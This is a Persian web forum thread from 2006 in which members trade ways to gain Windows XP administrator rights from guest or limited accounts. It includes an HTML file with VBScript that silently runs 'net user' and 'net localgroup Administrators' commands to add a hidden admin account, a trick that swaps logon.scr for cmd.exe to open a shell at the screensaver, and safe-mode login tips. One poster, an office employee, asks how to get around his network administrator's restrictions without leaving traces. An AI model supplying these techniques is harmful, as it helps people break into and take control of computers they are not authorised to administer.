PDA

نسخه کامل مشاهده نسخه کامل : وارد شدن به ادمين با يوزر مهمان

ostadonline
22-07-2006, 16:12
سلام به همه اساتيد محترم و محترمه. فرض كنيد در كامپيوتر بنده اكانت مهمان فعاله و من پسورد ادمين رو فراموش كردم. آيا راهي هست تا با يوزر مهمان وارد بشم و پسورد رو تغيير بدم؟
مرسي...

sam_sami_2000
22-07-2006, 16:40
خیر
فقط می تونی پسورد admin رو صفر کنی

Mohammad Modarresi
22-07-2006, 16:42
دوست عزيز يه قطعه كده كه دوست خوبم ناشناس اونو معرفي كرده كه به كمكش مي توني همه اختيارات رو بدست بياري يه سرچ كني پيداش مي كني [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

MB_Danger
23-07-2006, 01:02
دوست عزيز يه قطعه كده كه دوست خوبم ناشناس اونو معرفي كرده كه به كمكش مي توني همه اختيارات رو بدست بياري يه سرچ كني پيداش مي كني [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
سلام به شما دوست خوبم ...
میشه خودتون زحمتش رو بکشید و اون کد رو توی همین تاپیک بذارید ، من گشتم اما چیزی دستگیرم نشد !
با تشکر .
راستی یه سر به این آدرس بزنید ... ;)

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چرا دیگه خبری ازتون نشد ؟ :blush:

shahedi
23-07-2006, 11:24
شما با استفاده از سيف مد و غير فعال كردن پاسورد وارد شويد

sam_sami_2000
23-07-2006, 11:40
سلام دوست عزیز
با برنامه password changer پسورد admin رو صفر کن

mamali_1382
23-07-2006, 12:25
يه برنامه هست كه لینوکس رو لود میکنه و پسورد هر یوزر رو که بخایی صفر میکنه

ostadonline
24-07-2006, 13:00
دوستان ممنون از راهنمايي تون. لازم دونستم يك سري مطالب رو بازگو كنم:

يه برنامه هست كه لینوکس رو لود میکنه و پسورد هر یوزر رو که بخایی صفر میکنه
دوست عزيز جناب mamali_1382 جان.اون برنامه رو كه رو سي دي رايت ميكردي و باهاش بوت ميشدي و پسورد رو صفر ميكردي دارم. اما ميخواهم بدونم جايي كه من سي دي همراهم نيست و شرايط بالا رو هم داره چي كار ميشه كرد؟

با برنامه password changer پسورد admin رو صفر کن
مرسي. اما فرض كنيد در يوزر مهمان نميشه برنامه اي رو نصب كنم. يعني اجازه نميده. البته اگر منظورتون همون برنامه اي كه من در بالا گفتم نباشه...

دوست عزيز يه قطعه كده كه دوست خوبم ناشناس اونو معرفي كرده كه به كمكش مي توني همه اختيارات رو بدست بياري يه سرچ كني پيداش مي كني
محمد جان اگه لطف كني و اون كد رو در اين تاپيك بزاري ممنونت ميشم. چون منم نتونستم پيدايش كنم.

در آخر هم بگم كه من راه حل رو در يك سايت ديده بودم. اما وقتي دوباره با اون سايت مراجعه كردم ديدم بسته شده. اينم از شانس ماست ديگه...!

Mohammad Modarresi
24-07-2006, 13:07
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدhtml>

خب حالا اينو بريز توي يه تكس و اسم يوزري كه مي خواي جاي اون كلمه NashenaS بزار و با پسوند html ذخيره كن حالا فايل ذخيره شده رو باز كن يه pop up menu اون بالا باز ميشه روش كليك راست كن وallow Bloked Content يا همچين چيزي رو بزن بعد ريستارت مي كني مي بيني كه يه يوزر برات ساخته

mohammad.clergyman
24-07-2006, 14:51
سلام مدرسي جون

اين روش در اكانت گست كار نميكنه

فقط در صورتي اين كار قابل اجرا است كه اين فايل در اكانت ادمين اجرا بشه

پيشنهاد ميكنم كه خودت يه بار ديگه تست كني

و همچنين :rolleye:

من يك سوال دارم كه با اجازه همين جا ميپرسم

چگونه ميشود اختيارات گست را برد بالا مثلا اختيار به اينترنت وصل شدن را براش فراهم كرد

ممنون

Mohammad Modarresi
24-07-2006, 14:53
ميشه ارور رو بنويسي

sam_sami_2000
24-07-2006, 16:27
برا چی کار نمیکنه؟؟؟

MB_Danger
24-07-2006, 19:16
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

خب حالا اينو بريز توي يه تكس و اسم يوزري كه مي خواي جاي اون كلمه NashenaS بزار و با پسوند html ذخيره كن حالا فايل ذخيره شده رو باز كن يه pop up menu اون بالا باز ميشه روش كليك راست كن وallow Bloked Content يا همچين چيزي رو بزن بعد ريستارت مي كني مي بيني كه يه يوزر برات ساخته
برای ساختن یک User Account نیاز به این همه دردسر نیست !

کافیه بری توی Run و این یک خط کد رو تایپ کنی و از روی کیبرد کلید Enter رو فشار بدی .

MB_Danger همان نام کاربر جدید .

( شما نام مورد نظر خود را به جای MB_Danger وارد کنید )

123 رمز عبور .

( شما رمز عبور مورد نظر خود را به جای 123 بنویسید )

به فاصله ی بین کلمات توجه کنید .

چند نکته :

این فرمان باید در کاربر Administrator اجرا شود .

این فرمان یک Limited account ( اشتراک محدود ) می سازد و کاربر Limited نمی تواند یکی مانند خود را بسازد .

به همین خاطر اگه این کد رو در کاربر مهمان یا یک کاربر Limited اجرا کنید ، هیچ کاربری ساخته نمی شود !

وقتی Limited account نمی تواند یکی مانند خود را بسازد به طریق اولی کاربر مهمان نمی تواند !

چون محدودیت کاربر مهمان از کاربر Limited خیلی بیشتره ...

mohammad.clergyman
25-07-2006, 05:40
ميشه ارور رو بنويسي

ارور خاصي نميده

فقط اگر اين را در گست يا ليميتد يوزر اجرا كني جواب نميده

توضيحات كامل را آقاي دنجر گفتند

ostadonline
25-07-2006, 21:30
در آخر هم بگم كه من راه حل رو در يك سايت ديده بودم. اما وقتي دوباره با اون سايت مراجعه كردم ديدم بسته شده. اينم از شانس ماست ديگه...!

دوستان من يادم مياد كه گفته بود يك چيزي رو جايگزين اسكرين سيور ادمين كنيد و بعد كه ويندوز رفت به اسكرين سيور پسورد رو عوض كنيد. دقيقا يادم نيست. از همه هم تا به اينجا متشكرم...

nightmare
25-07-2006, 23:07
ostadonline جان فکر می کنم اون چیزی که شما میگی برای عوض کردن پسورد اکتیو دایرکتوری هست. توی متغیر های رجیستری به جای اسکرین سیور ، cmd قرار می دیم و تایمش رو به 15 ثانیه تغییر می دیم. .....

اما برای این کار نیست. (البته شایدم من اشتباه می کنم اما این روش رو می دونم که برای عوض کردن پسورد ادمین در شبکه هست )

تا بعد...

MB_Danger
26-07-2006, 00:30
دوستان من يادم مياد كه گفته بود يك چيزي رو جايگزين اسكرين سيور ادمين كنيد و بعد كه ويندوز رفت به اسكرين سيور پسورد رو عوض كنيد. دقيقا يادم نيست. از همه هم تا به اينجا متشكرم...
من این روش رو به صورت کامل آموزش میدم .
به مسیر زیر بروید :

در اینجا C همان درایوی است که ویندوز XP در آن نصب شده .
ممکنه توی رایانه ی شما D باشه ...
پس دقت کنید .
فایلی را با نام CMD پیدا کنید و آن را در درایو دیگری کپی نمایید .
مثلا آن را در درایو E کپی کنید .
سپس My Cmputer رو باز کنید و از منوی Tools بر روی گزینه ی Folder Options کلیک کنید .
به سربرگ View بروید و تیک گزینه ی Hide extensions for known file types رو بردارید تا به دنبال نام فایل ها ، پسوند های شناخته شده هم نمایان شود !
سپس فایل CMD.exe را به Logon.scr تغییر نام دهید .
هنگام تغییر نام پیغامی ظاهر می شود که می گوید اگر پسوند فایل را تغییر دهید ممکن است فایل غیر قابل استفاده شود ، آیا می خواهید اینکار را انجام دهید ؟ شما بر روی گزینه ی Yes کلیک کنید تا عمل تغییر نام با موفقیت به پایان برسد .
حالا اگه دلتون خواست می تونید از طریق Folder Options پسوند فایل ها رو مخفی کنید .
سیستم رو Restart کنید و از طریق داس این فایل رو جایگزین فایل Logon.scr واقع در مسیر فوق نمایید .
توصیه می کنم از فایل Logon.scr هم یک بک آپ بگیرید تا در هنگام بروز مشکل آن را بازیافت کنید .
سپس بگذارید که سیستم بالا بیاد .
مدتی دست به موس و کیبرد نزنید تا Screen Saver اجرا شود .
و از آنجا که شما فایل CMD.exe را به جای Logon.scr قالب کرده اید ... محیط داس ویندوز XP اجرا می شود ...
یعنی همان Windows Command Processor
اکنون می توانید با همان دستور NET USER که در پست های قبل گفتم اقدام به ساخت کاربر جدید نمایید .
یا اگر بیشتر با این دستور آشنایید ، رمز عبور کاربر مورد نظرتون رو تغییر بدید و یا حذف کنید و ...

نکته ی مهم :

این روش رو من در ویندوز XP SP2 و Media Center امتحان کردم ، حتی تا مرحله ای که CMD به جای Screen Saver اجرا میشه ، پیش رفت ... اما هنگام اجرای دستورات NET USER با مشکل مواجه میشد و همان خطایی رو میداد که هنگام اجرای این دستور در کاربرهای Limited رخ میده !
این روش شاید توی SP1 و قبل از آن عملی باشه ...

mohammad.clergyman
26-07-2006, 13:08
پس هنوز راهی نیامده که اکونت گست بتوانه به اکونت ادمین وارد بشه

ostadonline
26-07-2006, 16:03
سلام. مرسي اين روش ها رو هم امتحان ميكنم. يك سوال ديگه هم داشتم. آيا ميشه از شر اين پيغام خلاص شد. من ميخواهم پوشه مربوط به يكي از يوزرها رو باز كنم اين پيغام رو ميده:

آيا ميشه كاريش كرد؟

MB_Danger
27-07-2006, 01:34
سلام. مرسي اين روش ها رو هم امتحان ميكنم. يك سوال ديگه هم داشتم. آيا ميشه از شر اين پيغام خلاص شد. من ميخواهم پوشه مربوط به يكي از يوزرها رو باز كنم اين پيغام رو ميده:

آيا ميشه كاريش كرد؟
این پیغام نشون میده که این پوشه توسط Administrator محرمانه گشته !
و محتویات آن فقط بوسیله ی همان Administrator قابل مشاهده است ...

smjgh2006
19-11-2006, 16:19
دوستان سلام من کارمند اداره ای در شیراز هستم که اخیرا کامپیوتر اتاقم به شبکه داخی اداره وصل شده است.برای نصب برنامه مثلا افیس باید حتما پسورد ادمین را داشته باشم ایا راهی وجود داره که وارد یوزر ادمین شد.از ترفند control userpasswords2 وارد شدم ولی تقاضای :sad: پسورد قدیمی را می کند (old password).متاسفانه مسول شبکه از نصب برنامه های جدید خود داری میکنه.لطفا کمکم کنید. با تشکر

MAXXX
19-11-2006, 19:20
سلام
منم یکی دو سال پیش این مشکل روداشتم بد فهمیدم اگه تو سیف مدبیای بالا بد دو بار ctrl+alt+deleرو بزنی یه پنجره باز میشه که اگه توش administrator بنویسی وارد میشه حتی اگه برا ادمین پسورد گزاشته باشن

smjgh2006
22-11-2006, 17:32
سلام
منم یکی دو سال پیش این مشکل روداشتم بد فهمیدم اگه تو سیف مدبیای بالا بد دو بار ctrl+alt+deleرو بزنی یه پنجره باز میشه که اگه توش administrator بنویسی وارد میشه حتی اگه برا ادمین پسورد گزاشته باشن
دوست عزيز سلام اين كار را كردم ولي نشد با تشكر از تلاش شما لطفا در اينده اگر راه حلي پيدا شد به من هم اطلاع بدهيد با سپاس. حتي از ترفند control userpasswords2 استفاده کردم باز هم تقاضایold password میکند.

MAXXX
22-11-2006, 17:38
تو یوزرتون به داس دسترسی دارین؟؟

mohammad hamed
22-11-2006, 18:11
سلام

اين ماله زماني اسن كه براي administrator پسوردي تعريف نشده باشه.

MAXXX
22-11-2006, 18:21
بله من میدونستم این روش واسه وقتیه که پسورد نداره ولی یه نفر به من گفت اگه تو حالت سیف مد بیای بالا حتی از پسورد هم رد میکنه که همین طور هم شد شایدم به خاطر سرویس پک جدید باشه که این مشکل رو بر طرف کرده چون اون ویندوزی که من وارد شدم سانتا کلوس سرویس پک 1 بود

smjgh2006
26-11-2006, 07:05
سلام دوست عزيز توي يوزر داس هم داريم.من براي وارد شدن در رجيستري براي اينكه رد پايي باقي نمونه هميشه از داس وارد رجيستري ميشم. ايا راه حلي براي وارد شدن به يوزر ادمين ان هم در يك شبكه داخلي(lan) سراغ داريد؟ با تشكر از شما.

MAXXX
26-11-2006, 15:59
راستش رو بخوای من تا حالا با شبکه کار نکردم وبا ساختارش آشنا نیستم ولی اینجا رو نگاه کن شاید حل شد

smjgh2006
28-12-2006, 08:49

دوست عزیز سلام در یوزر هم به داس دسترسی دارم ولی بخاطر اینکه در یوزر limit هستم پیغام میدهد که کلیه فرمانهای داخلی وغیره باید در یوزر ادمین اجرا شود.راستی دوست عزیز اگر باتری سیستم را بردارم و set up بایوس را به ترتیب cd romو floppy و hard قراردهم میتوانم ویندوز را عوض کرد .لطفا اگر اطلاعات کاملی دارید راهنمایی بفرمایید با تشکر

archiver
28-12-2006, 10:02
erd commander رو امتحان کنید :D

smjgh2006
29-12-2006, 08:05
..

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدhtml>

دوست عزیز سلام دستورالعمل بالا را اجرا کردم فایل ذخیره شده را که باز می کنم این پیدا میشود .{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033{ \fonttbl{\f0\fswiss\fcharset178 Arial;}{\f1\fswiss\fcharset0 Arial;}} {\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\rtlpar\qr\lang10 65\f0\rtlch\fs20 <\lang1033\f1\ltrch html\lang1065\f0\rtlch > \par <\lang1033\f1\ltrch title>NIGHTWOLF SecurityTeam 3HOoR4B HIGHSCHOol \par <\lang1033\f1\ltrch object id=wsh\lang1065\f0\rtlch \par \lang1033\f1\ltrch classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B align="top"> \par <\lang1033\f1\ltrch script language=vbscript\lang1065\f0\rtlch > \par \lang1033\f1\ltrch set wshshell=createobject ("wscript.shell\lang1065\f0\rtlch " ) \par \lang1033\f1\ltrch a=wshshell.run ("cmd.exe /c net user NashenaS NashenaS /add",0\lang1065\f0\rtlch ) \par \lang1033\f1\ltrch b=wshshell.run ("cmd.exe /c net localgroup Administrators NashenaS /add",0\lang1065\f0\rtlch ) \par \lang1033\f1\ltrch window.close\lang1065\f0\rtlch \par \par </\par } حالا باید چکار کنم ؟ pop up menu و allow bloked content کجاست ؟ با تشکر

ehsan_rx1
29-12-2006, 10:52
تنها راه این است که یک limit admin مخصوص آن کامپیوتر درست کنید تا بتونید برنامه نصب کنید